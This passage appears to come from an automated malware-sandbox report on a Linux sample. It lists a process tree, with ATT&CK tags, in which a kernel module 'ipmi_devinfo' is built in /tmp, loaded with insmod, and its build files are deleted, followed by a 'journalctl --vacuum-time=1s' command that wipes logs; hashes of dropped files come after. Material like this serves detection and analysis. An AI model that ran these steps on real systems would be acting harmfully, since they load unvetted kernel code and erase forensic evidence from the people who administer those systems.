-Wno-restrict -Wno-maybe-uninitialized -fno-strict-overflow -fno-merge-all-constants -fmerge-constants -fno-stack-check -fconserve-stack -Werror=date-time -Werror=incompatible-pointer-types -Werror=designated-init -fmacro-prefix-map=./= -Wno-packed-not-aligned -DMODULE -DKBUILD_BASENAME='\"ipmi_devinfo.mod\"' -DKBUILD_MODNAME='\"ipmi_devinfo\"' -c -o /tmp/a/ipmi_devinfo.mod.o /tmp/a/ipmi_devinfo.mod.c"6⤵PID:2009
-
-
/usr/bin/rmrm -f /tmp/a/.ipmi_devinfo.mod.o.d6⤵
- System Network Configuration Discovery
PID:2010
-
-
-
/bin/sh/bin/sh -c "set -e; echo ' LD [M] /tmp/a/ipmi_devinfo.ko'; trap 'rm -f /tmp/a/ipmi_devinfo.ko; trap - HUP; kill -s HUP \$\$' HUP; trap 'rm -f /tmp/a/ipmi_devinfo.ko; trap - INT; kill -s INT \$\$' INT; trap 'rm -f /tmp/a/ipmi_devinfo.ko; trap - QUIT; kill -s QUIT \$\$' QUIT; trap 'rm -f /tmp/a/ipmi_devinfo.ko; trap - TERM; kill -s TERM \$\$' TERM; trap 'rm -f /tmp/a/ipmi_devinfo.ko; trap - PIPE; kill -s PIPE \$\$' PIPE; ld -r -m elf_x86_64 -z max-page-size=0x200000 -z noexecstack --build-id -T ./scripts/module-common.lds -o /tmp/a/ipmi_devinfo.ko /tmp/a/ipmi_devinfo.o /tmp/a/ipmi_devinfo.mod.o; true; printf '%s\\n' 'cmd_/tmp/a/ipmi_devinfo.ko := ld -r -m elf_x86_64 -z max-page-size=0x200000 -z noexecstack --build-id -T ./scripts/module-common.lds -o /tmp/a/ipmi_devinfo.ko /tmp/a/ipmi_devinfo.o /tmp/a/ipmi_devinfo.mod.o; true' > /tmp/a/.ipmi_devinfo.ko.cmd"5⤵
- Command and Scripting Interpreter: Unix Shell
- System Network Configuration Discovery
- Writes file to tmp directory
PID:2011 -
/usr/bin/ldld -r -m elf_x86_64 -z "max-page-size=0x200000" -z noexecstack --build-id -T ./scripts/module-common.lds -o /tmp/a/ipmi_devinfo.ko /tmp/a/ipmi_devinfo.o /tmp/a/ipmi_devinfo.mod.o6⤵
- System Network Configuration Discovery
PID:2012
-
-
-
-
-
-
/usr/sbin/insmodinsmod /tmp/a/ipmi_devinfo.ko2⤵
- Loads a kernel module
- System Network Configuration Discovery
PID:2013
-
-
/usr/bin/rmrm -rf /tmp/a2⤵PID:2014
-
-
/usr/bin/grepgrep -q ipmi_devinfo /proc/modules2⤵
- Reads list of loaded kernel modules
- System Network Configuration Discovery
PID:2015
-
-
/usr/bin/awkawk "/system-cache/ {print \$2}"2⤵PID:2018
-
-
/usr/bin/psps -ef2⤵
- Reads CPU attributes
- Reads runtime system information
PID:2017
-
-
/usr/bin/journalctljournalctl "--vacuum-time=1s"1⤵
- Deletes journal logs
- Reads EFI boot settings
- Reads runtime system information
PID:1401
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
218B
MD52bcd184c516849e887345d8997b4c9ee
SHA158184e255f8ceccafbe5f867d8c2f9de467c1a0c
SHA2566b72d80700c3db2cdfac763792a6c4e2b00735b2d176540809e570e4294462c3
SHA512d6dccaa2dd1f704547f101e3bda08102488a965ae73ef029d59c53906da642aa35b6e1b9c49dcb0b9970b3955911edc5c2a3f12bd39abd582f772ffa84c052de
-
Filesize
97B
MD52e48b423f80c006e54e0936dc5e40159
SHA1f586494d532db2dd93f539ba5d8420d47b5741a3
SHA2565826b3cf3e2800dde188edfe7abeb13cb504124a4d4a1f58f552b7f6955d3d01
SHA512e501531c3350259526b75f3f7154a8b5c705b0541105a20c07afefd21d0d043cec9236ac74a3dc0b2908b8074a966747b264718848e60e931da72dc7b936c875
-
Filesize
9KB
MD5b3dc0edb02c959ad9f586928434aeb1d
SHA13429f4785030b698acbe12cb75c30a63d02620b2
SHA256f1e3ea97b5f11f8422c39820635208a26c0fdb7b115cc9e9337b89786c87282c
SHA5126b640b5f3386fe707bf225dba11c6c3647be81de848f88363f6fc8c7ac7a06a407d8b9e4fef550ef51a4f4b9c26577b70b128f63993b1873ff9b0b8846030933
-
Filesize
16KB
MD5176e28eca80adadc4f286139d5064721
SHA154706e7a990e133c185587261bd50cd6ddb001a9
SHA256e034d8b3040736166b85bc6864ce9f4be7a903168c4c167ba9a4fc19340a59f5
SHA51258f2f63fa76a37a091a3b6cba397bd71a1278ca551d7c9c6cf65c4203f17c026eb1625a74db330d06307f5eed07b54a5dc5ab91bd65ebd8d8533fdb95847e1c8
-
Filesize
1KB
MD5c3b5bca65e6db252b2dde547c0c70d9a
SHA151585e280ae391a6b9263254b469291cd9847eea
SHA256b7dfad37a5bf416ac249b7559aabd58fd566f54f988334bcef6cabd67d0b19b4
SHA512af381fccb65523533a27cb841a4b1ef475ffed2f66168b93de569264d50aad232b85c6dc3c545e94158caff3a192468de21b4516fd90c9a316cdc225df0c2ba6
-
Filesize
748B
MD57e385762ff3bc947739032164d66d2cc
SHA1576c8f75898ba87b57ad83f2a760a600d6f44e5c
SHA25685546de4485f28335374ac3750070d8d08810a6f3887c2f4a06dba83b4f4ca3a
SHA512f4978e1c3809716cf9a2eeef909efe3b8a1570ec1578f84ab4a9e86628c45c95e260a3fda7559f7dd80cebfda05667536469a003a43b9e856cf3e2bb61f29ae1
-
Filesize
936B
MD5bc0729db2a5fff3bcd0fabbe6fc51e05
SHA1285992aeb810c1c87157ab32ae1732a01983d366
SHA256b62edeeee6f86ccc23a046203e4d07fa074480fc34a1cf781618477c941e0a7d
SHA512cf601603eb2d351e02407164f75bd11af5f26bdc6e9eaa4c52119b6a0066851a9569eb0c6e7add4c4cba80c2d9e9944459bee59d7911dd1cc89229befa251016
-
Filesize
1KB
MD56c5d19607ea19fae64095e61c45e39f8
SHA1adba98fab04869a09fcc0711c48d56afcdeb699e
SHA25655cff84058f5994ad756338b3b8904d859db9b5d9316f3302e6161047a1e8895
SHA512ea5941a837d2cf6671fa55d35c3d63012dcc964fdf4f66047261c6230920057dc29bea3623da6afd6bc6ffc99e8669d65078e98b7b203acf4956c965c409b135
-
Filesize
1KB
MD52988d41679776c5e76920bac63f78269
SHA113f320a5fd57394e51297ae31f75c62ce3d537b1
SHA2568b0ef07d7e860825e3543f65b2a05b65380ac2b555fa62fc7254837b1c981fc1
SHA51211f5004ac8e0b7e93d9434bded7e22dbc20c6dfda27ebcf2e82d5b90d01cee14e249076d88360ae9b3f1d72e8e3e98a77b6d96f9e969ca179ee6ef4a9569ec4d
-
Filesize
1KB
MD5ed18a84b37afe5fa58e1b0b9a685a68a
SHA1414a72289080bd526c099822ae851df430563319
SHA256c3b289ae4930fe0e4df0478fb747b828b6d83b87fb024f8b05e531a20b427880
SHA512bea8f75a03f8b8b7b462b4bf87cf7005fb2b8e3f8beb7f3968a3995d59e51eeafe40b469ba55aa156f12ad090241b35c363148938386282482f63b8dcee90b0a
-
Filesize
768B
MD57f7186fa031df96a0cd0de550c1b5dee
SHA13a89afc78a484666da505837da48e09c5d57397d
SHA2566094e767954b1f075a5a5a655d9643f864db2d7b36b52f7e895c6335cc79f12c
SHA512d43e1eded33da415480d64764389907d5b9a73c2c40070ce1bb0790533719115fbc9c03f466ccbaa877078a13e7b54d86b1b2c9f64f6b9efbf0fa8b105511dee
-
Filesize
4KB
MD5b42b3089dfcc699b2beb5747d16e275c
SHA18b278306e0c810f080d33750bfb0d425536a404f
SHA256083f334d04b31146eafa1cc709c2fa3c5a9693f90cead26be7f32fc37fa81857
SHA5122c3d1a65c8d1eb8c10ff67a6eef05e60cb54fd9f4be9806be089c467fd868638e56542a09cec67bd45774ebaaf05089869baa5433f948e5dbf1cccb12a1f2555
-
Filesize
904B
MD5dda5182ca0f8fb1dd94da09938929ab7
SHA1f7e3666c7a78d856c93448f61d6ff6c3550cfa07
SHA2567c8d1666ab2c548463fd1efcc5b11669c62e8a362ebb1e3de4d528a50316a3f2
SHA512aa186de96ee7c4ee779e99d41c44779ccf984fb4c00caac11e7dd93798afb36ad3e5c4ef1d6f09f4fab129528c97853a6594a9132a08528f0e5a4a3ca66307f6
-
Filesize
904B
MD53ac77bd13934fe2825c76b58720d8f50
SHA1b730b38dfa1822ed35730561238c2be77db83de2
SHA256721bf6b95ff37660695e4125c7e17e41cba469ec603bb6f5115d130f6447a188
SHA51208097c2f0900f4ac71a6aac5dc497a9e5f9e43a1cb59d8e17c3f75ffd79f9477867e7c1810ac6a6e318d03bfafa96523ca1423aabb2c4ceb77ae7887cd152b3e
-
Filesize
656B
MD5e3f8696bc3c5d8afade97a452e0b5727
SHA1da2d753727122131c01cccf6b688dd90406cabc0
SHA2560e13f2b81bc091314e70ed691f29ca8933e5492306d5c8f0568bc7812aed1d40
SHA512df066ed3252310d426f48da28195164e4478c24ea51e6330aba4717c79f255ab765ac58df9985a65e54828a3938ba9c71f6c22ef5b075df254882c361b411eae
-
Filesize
664B
MD56e6c01c18a00b5bae910834a0c886f25
SHA1bbbda29ff0e639da115f8a6f0350223f66d11e96
SHA2561dbdc67304351f7190334c65ac58e983e82a80f2ec4f7af7ebc376a109a66937
SHA512b254c451985a87738bb2d37d21eef6c7771fa7547473e74bb49246e856bde232be2c0e08e9af2451663663198ca56acf8a11eb40bdc8ad28a085eba7c5f2edef
-
Filesize
664B
MD51133cd8bc94a2d5c9ab6107a919ce5e8
SHA1ebcf6be61e0c072c826067d20df081b504ba6895
SHA2567b9238b6c6d735148d665b5558e60181737337db5b2a72e70c2d30f014b58672
SHA5125a4554c8df7d2e1c0c3d6986f2a271cd2f4cd650d18622e41b977fed6b1f61712f7560dcc49ab8686867bb47fe151669e055d8befc299dd280b62d8d0dce65ff
-
Filesize
664B
MD5511a8fe0d35dac20aa285e6a383df3b2
SHA1910a2bf078747adc8f56485b32ba3affdfdaa7e9
SHA256f3be00eb594a5416c340192b23be6063b07bf112bc11b85670a29a34ee9e8b44
SHA51275b2d46321d5bebb4f6cfe9c01bfedcf6593e417c6c48ccc28d1fb4b1340834bdabbf1f635ca0f497cc1c5f9a835947479151690c44e28e732ed2c6755c0441f
-
Filesize
664B
MD57acfa9e1c38d818b6a764e0bf001e042
SHA18cb392d8978b0a5532cead4f7b51ef49046b64e2
SHA25613457c4809d7814e1d0bbb4188311e4a341497b1db46de58ed654f09dd70c073
SHA512506f99b58f059d49d56018c978db2c0c121c68526308c95165cfbaee413beecbbc34eb9a4ee48b9429be788a0b0c962492111a90c56f39bde821ccbaffeb88ac
-
Filesize
664B
MD54e6dce51b0b0af65bcac45983d85cbff
SHA1eaed522995a23f7720ae0d4d00ead5b0c0f7cb39
SHA25657aa1cb2881f2515dc90c7a49a349e4928b2a792d2ddde3cf136fa1db7be0403
SHA512212520974bd9e396cfc81c2c9a04a5a235c6478b8969179506f9cfd1bd542d8385b4d1e2944035e400e7140db7ed53faa2e9baa2dd2987e139384400608a7b51
-
Filesize
664B
MD5c9b00f7b94180b5950847679449c8c62
SHA1d7c80749db940e27b1c69cf8eeea0bf256c7d731
SHA2562c962e671163a571399a043f18df2cf64272f589174fec1d72f4b4fb00197d55
SHA512eedd16ad9a7535b20e542e068eb525b3ab6efa1b00e2a32406416b15a32efec6b05e86db1b117e028d1888664e6a1abf6fd57b31cb0ecbdcbee97e0e3688807f
-
Filesize
98B
MD5f7a6dad5ac376afb19a99a71b63c93f2
SHA1186e8ac4ce51ce83a27fcc677d36a58cc364b4a9
SHA25632dfa98dd9545ebbed8a3c80542174fc855267aa8d4e0fa152f437d39fa2b4e5
SHA5127f809984c55d4d2afcc924ff01e49a820c409fdf13a199e3b096123289c673dc802567c42611a8fc3330adf755fcaf2434a56a4fa8c7cfd940d1fc6629e14736
-
Filesize
23B
MD58abea6900d241bc798f2cdaf725eb179
SHA105bf45f9bc83da2eae7b3b8f2d814cebe74054f8
SHA2561dc0438a04d3d1f50fe10cdda4c69792d5c2d322c861085f790723d6fbc285a5
SHA512be31994a0c5eafcd2cc20a93f73b189f496b6f96c766c7445b8a8500bf12bf8b7d75a2fc844691690f67d28aa8047d65e744204343f23fcd76cc3bb7022e3ba3
-
Filesize
308B
MD509084051281fd3f69a850a5d26925840
SHA1e0c0e6ddcf7d6be7b227040728d8d19827fc48ac
SHA256992cae89aaa2415c314433dc92a5840d213a644a438ab8ef14c00f2510fd0ce1
SHA512e42bb4e5237f2fdf89f5b6d97e09a1dbfd18b448da5cc38b3c9ec98963b0bc89a771efd441fc75dfd44773c37e27fb1e5c290ade16c4d29ba5e9de366f97df38
-
Filesize
31B
MD50ea339d820a55369e68da293400b0f07
SHA1eb13173bc72efa2b50b7d86710db7d1bbd155465
SHA2565d10e7d3bc958186cced8f337bca5eeb6d33e4478a9276992bb48200e20c26ca
SHA512f78435e080318f8a8cf0b257e1dbcd4670d0df7bbf346ffd6bfa0f1ffeb22f7ea4a3a2d0850306ed96c6b7fb10738cd3269211c8b0f7a3223b546814d5664244
-
Filesize
555B
MD56f6f658ba78fef9c873a7e4dd74761cb
SHA12dcb23d1b33902312256ef17b08ff9a8b520d39b
SHA25671f3db017c2ab9dbbe8868f337276d21b7f12bcec64b85b360768cb935ef30bc
SHA5120468d093da50ec2899689666443965c559e7618a4bc1812842bf54086e531553d9c34035e9a6d8e3ce458ef0feef44b21f1e0016b68885e1ead7533269200415
-
Filesize
1KB
MD5a2d5b4bcd97e8b066063da86880cdfa6
SHA19cbd11154dac1411946a4abfe0ea14096bd87e0e
SHA25674e4cb3fe062adfb94600570a33b6ade2f9caab39c1120b1eaa0b681f7ef4e38
SHA51221594366a4b97a2215cc6617ccef28779f7e7a8828b89b3048f1cdacacd228923967ea3669fc567882b3401d99bcf71f935516437af40a1494170e21c6d3df2a
-
Filesize
549B
MD5cef729fab09cd536d617ffe059b65515
SHA18d3213666dbba75c9172eee83a45ce2342739acc
SHA2566ce594ac004dee1ec84dddc3ebeadfa66452c31f4a0ca5d36525085287fa48c5
SHA51292cbef6d10d95e41119d056a0a72deec56bbad73c773f4f7baa8a01d545cbe50aae0925ee355c6151c99f345a73fd106f66c3cc778511e96bd86c78992b8fc62
-
Filesize
296B
MD5aa97a1bea5fb09dcdde09e92d82c3d4a
SHA13f8911a38bca76e3a06d9bb8287b90a52f66abcd
SHA256fd1a0480fe346efe204f8862fe0e35932e3ac7e03e2520e6505ca9db8dacb05c
SHA512923f1fe6877aee647579cfc76f90941ec6f2d2171d56a63014b7393e0b74bc3f20eba80f700b11a4b33b54f2461178c0d5381fed46dbf216203a71da9b49d4d2
-
Filesize
2KB
MD5d1882a5385494e46fc818c75a10c708e
SHA130a6f4416dc7520bb8ce64b410f1850b6b846c30
SHA256b1da87d78b959ac1cec0e9f615d437d944702005706c4f1ff40651b5d838c21a
SHA512ca1ecffd486ee6af3d5d5f611c186343a85ce62383fe01d8b36969308fb540b612074c8f6475a3d31c04b85a03d34e3040a8797d9f341a4337ca3dc270165354
-
Filesize
113B
MD5bd7de1fb750339d400780e1116d5bc56
SHA11b698dffdd0e5c6f770dbf9ba5d6427e6353934c
SHA25626a3e5949377a670c7c9a58095c1531da9f8a1409ab0306ad46a0b078aa8c8fb
SHA51244d84527481f8d4ce4a91eb4ccf5aaa917ccfbee02312d6550400b0aba926913421250aeda58d332be331d311b4d05427060aefa81126ad994fedf19765534a5
-
Filesize
13KB
MD5f24fc4f0af3d392fc97d4da8233a0e14
SHA187393728ac1cbe881d545569b697d56b7aa78a21
SHA256b545aba33560752dfa663f9c9d8e7d1d354d6efd9b506b78ba12972d362dcf17
SHA512d19c6933832ecc996b57d52a4ba26b8178ebab55d930eec9cb02e4417ba8c66023fb30b6dad4ca765902a2c95c137f36b0b4c1ffbe118b6a4193468735d974e7
-
Filesize
570B
MD50eb4551c7e9c89120f3f65eece961802
SHA1013f44c320755714ad6adefba2a56b48c8bdfb04
SHA25652edfdbad34f5e6fe897eb93e7433a622ce032b6209f93e217e59f1f2a50a89b
SHA5127f54f568ca297019cea678a0265d1763bcdb07287863cdf53e225c01f74f02dfe73108f1308469b3e279c41f3b4b5474778875bbd5f3e4e56e8afa4e48a60d0b
-
Filesize
610B
MD5a19b4cda43458d8278685efcf6cd19f4
SHA1aae8a82231f5fe40ce15dd694ce5d2f4bd1b77fd
SHA256d01fa612dc8dfb904091ffcd1c7602eba981fe40c5a51b9c111f298b659feb03
SHA512a64cca73f335205119f8a708ef023d0fbaac8dddb0ead12d68fe8923c4f2b73e13096342d638631144e8ac8861cd75503079161094beb16054b7287b0acb2128
-
Filesize
658B
MD5806438cc4370014b51d647ddf637dcc3
SHA159ecfea2ba81469e5b87de65d16ad853c9cf92ef
SHA2560aa23427dd75fa7f2d5457106509c65d0b3be51a8c18315bb0b61833c55ac3df
SHA512c287389653ccfc64c762e3f449a91b499035fa8620b77b56da0db4a471ad320188b63a1d1e3be31e11b40ca90449ad55f03f5fb6b8740caf52acd3de8ba73d89